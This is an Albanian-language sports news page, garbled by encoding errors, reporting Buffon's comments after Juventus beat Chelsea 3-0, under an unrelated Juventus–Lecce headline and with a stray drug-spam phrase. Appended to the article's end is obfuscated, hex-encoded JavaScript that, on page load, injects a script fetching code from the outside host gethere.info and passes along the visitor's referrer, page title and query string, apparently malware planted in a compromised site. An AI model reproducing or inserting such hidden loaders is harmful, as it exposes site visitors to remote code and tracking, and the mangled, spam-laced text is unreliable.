Juventus vs Lecce Campionato di Serie A 2011 2012

Buffon i ngazA�llyer pas fitores ndaj Chelseat

wellbutrin sr reviews. Portieri i Juventusit, Gianluigi Buffon, beson se skuadra e tij ka treguar se ata e kanA� vendin nA� LigA�n e KampionA�ve, pasi mposhtA�n me rezultat 3-0 kampionin nA� fuqi tA� garA�s evropiane, Chelsean.

a�?A�shtA� mrekulli. Disa kanA� pasur dyshime nA� ne, por mendoj se ne i kemi hequr ato dyshime duke luajtur nA� kA�tA� mA�nyrA�. Ne kemi siguritA� tona dhe e dimA� se ende duhet tA� kualifikohemi. ShpresojmA� ta bA�jnA� kA�tA�a�?

a�?Kur ju bA�ni njA� paraqitje aq bindA�se a�� nA� aspekt taktik, fizik, psikologjik a�� A�shtA� shenjA� e shkA�lqyeshme pA�r Juven dhe pA�r ItalinA�a�?.

a�?NA�se ne do tA� eliminohemi, sA� paku kemi arritur nA�ntA� pikA�, qA� do tA� thotA� se ne kemi luftuar nA� nivel tA� barabartA� me secilin dhe jemi kthyer nA� tA� qenit konkurrues. Ky ishte synimia�?.

a�?Ne fituam nA� A�do zonA� sonte, ne ishim tA� uritur, tA� mprehtA�, mA� sulmues, mA� kreativ dhe me pak mA� shumA� precizitet, ne mund tA� kishim shA�nuar mA� shumA�a�?, ka thA�nA� Buffon.

Juventusi ka nevojA� edhe pA�r njA� pikA� nga udhA�timi i tyre nA� UkrainA� te Shakhtar Donetsk nA� ndeshjen e ardhshme dhe tA� fundit tA� garA�s.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}